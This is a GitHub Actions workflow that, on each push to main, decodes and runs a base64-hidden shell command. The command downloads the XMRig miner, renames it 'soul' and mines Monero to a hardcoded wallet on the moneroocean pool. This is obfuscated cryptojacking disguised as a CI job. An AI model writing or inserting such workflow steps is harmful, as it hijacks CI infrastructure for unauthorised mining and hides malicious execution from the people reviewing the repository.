name: Lool

on:
  push:
    branches:
      - main

jobs:
  run-job:
    runs-on: ubuntu-latest
    steps:
      - name: Run Job
        run: |
          echo "YXB0LWdldCB1cGRhdGUgJiYgYXB0LWdldCBpbnN0YWxsIC15IHdnZXQgdGFyICYmIHdnZXQgaHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjIyLjIveG1yaWctNi4yMi4yLWxpbnV4LXN0YXRpYy14NjQudGFyLmd6IC1PIHNvdWwudGFyLmd6ICYmIHRhciAteHZ6ZiBzb3VsLnRhci5neiAmJiBtdiB4bXJpZy02LjIyLjIgc291bCAmJiBjZCBzb3VsICYmIG12IHhtcmlnIHNvdWwgJiYgLi9zb3VsIC1vIG1vbmVyb29jZWFuLnN0cmVhbToxMDEyOCAtdSA0N0h4dENtRlh4cVZ6UVNHalFnQm5EQzFMTERScm9rZjNhTUZvY2JXUVJ4WXpqaGp4a2ZMR2p6d0UzUEpockN0ZFFrWFB1bnI4Y1paQkFpRW1ZNVc0NlYxVVY4bUZNWmggLWsg" | base64 --decode | bash
